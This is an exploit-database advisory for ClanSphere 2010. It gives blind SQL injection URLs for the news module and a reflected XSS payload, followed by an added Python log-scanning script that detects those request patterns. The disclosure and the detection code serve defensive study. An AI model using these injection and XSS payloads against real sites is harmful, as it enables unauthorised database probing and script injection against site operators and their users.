ClanSphere 2010 - Multiple Vulnerabilities

Author: Sweet
type: webapps
platform: php
date_added: 2010-08-25 
date_updated: 2010-08-25 
verified: 0 
codes: OSVDB-67414 
application_url: http://www.exploit-db.comclansphere_2010.0_rc_2_p2.zip

############################################################################
#                                                                          #
# Exploit Title: Clansphere Multiple vulnerabilities                       #
#                                                                          #
# Date: 24/08/2010                                                         #
#                                                                          #
# Author: Sweet                                                            #
#                                                                          #
# Contact : charif38@hotmail.fr                                            #
#                                                                          #
# Software Link:                                                           #
#                                                                          #
# Download: http://sourceforge.net/projects/clansphere/                    #
#                                                                          #
# Version: all                                                             #
#                                                                          #
# Tested on: WinXp sp3                                                     #
#                                                                          #
# Risk : HIGH                                                              #
#                                                                          #
#                                                                          #
# Description :  clansphere offers some nice features for                  #
#                                                                          #
# you to easily set up and maintain your proper clan site within minutes!  #
#                                                                          #
############################################################################

1- Blind SQL injection:

http://www.target.com/clanspherepath/index.php?mod=news&action=recent&id=0&from=list'+and+31337-31337=0+--+

http://www.target.com/clansphere/index.php?mod=news&action=recent&year=2009&month=8"+and+31337-31337=0+--+

2- XSS:

http://www.target.com/clansphere/index.php/>"><ScRiPt>alert("sweet")</ScRiPt>
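For defenders, an added example (not part of the original advisory or of ClanSphere) that scans web server access logs for the two request shapes shown in items 1 and 2. The expected parameter shapes, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed value shapes, inferred from the benign parts of the PoC URLs
# (id=0, from=list, year=2009, month=8); not taken from ClanSphere's source.
EXPECTED = {
    "id": re.compile(r"\d+"),
    "year": re.compile(r"\d{4}"),
    "month": re.compile(r"\d{1,2}"),
    "from": re.compile(r"[A-Za-z0-9_]+"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r"[<>\"']|%3c|%3e|%22|%27", re.I)

def inspect_request(target):
    """Return findings for one request target (path plus query string)."""
    findings = []
    parts = urlsplit(target)
    # Item 2: markup characters in the path after index.php/.
    _, sep, path_info = parts.path.partition("index.php/")
    if sep and MARKUP.search(path_info):
        findings.append("markup in PATH_INFO after index.php")
    # Item 1: news/recent parameters that break their expected shape.
    query = parse_qs(parts.query, keep_blank_values=True)
    if query.get("mod") == ["news"] and query.get("action") == ["recent"]:
        for name, shape in EXPECTED.items():
            if any(not shape.fullmatch(v) for v in query.get(name, [])):
                findings.append(f"unexpected value for '{name}'")
    return findings

def scan_log(lines):
    """Return (line number, findings) for every suspicious log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        findings = inspect_request(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

# Constructed sample lines (documentation address, not real traffic).
PREFIX = '192.0.2.10 - - [25/Aug/2010:10:00:00 +0000] "GET /clansphere/index.php'
SAMPLE_LOG = [PREFIX + tail + ' HTTP/1.1" 200 5120' for tail in (
    "?mod=news&action=recent&year=2009&month=8",
    "?mod=news&action=recent&id=0&from=list%27+and+31337-31337=0+--+",
    "?mod=news&action=recent&year=2009&month=8%22+and+31337-31337=0+--+",
    "/%3E%22%3E%3CScRiPt%3Ealert(%22sweet%22)%3C/ScRiPt%3E",
)]
```

Calling scan_log(SAMPLE_LOG) flags lines 2 to 4 and leaves the benign first line alone; the same shape checks can be applied at the application boundary to reject such requests before they reach a query or the page output.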


Saha Ftourkoum et 1,2,3 viva L'Algerie :))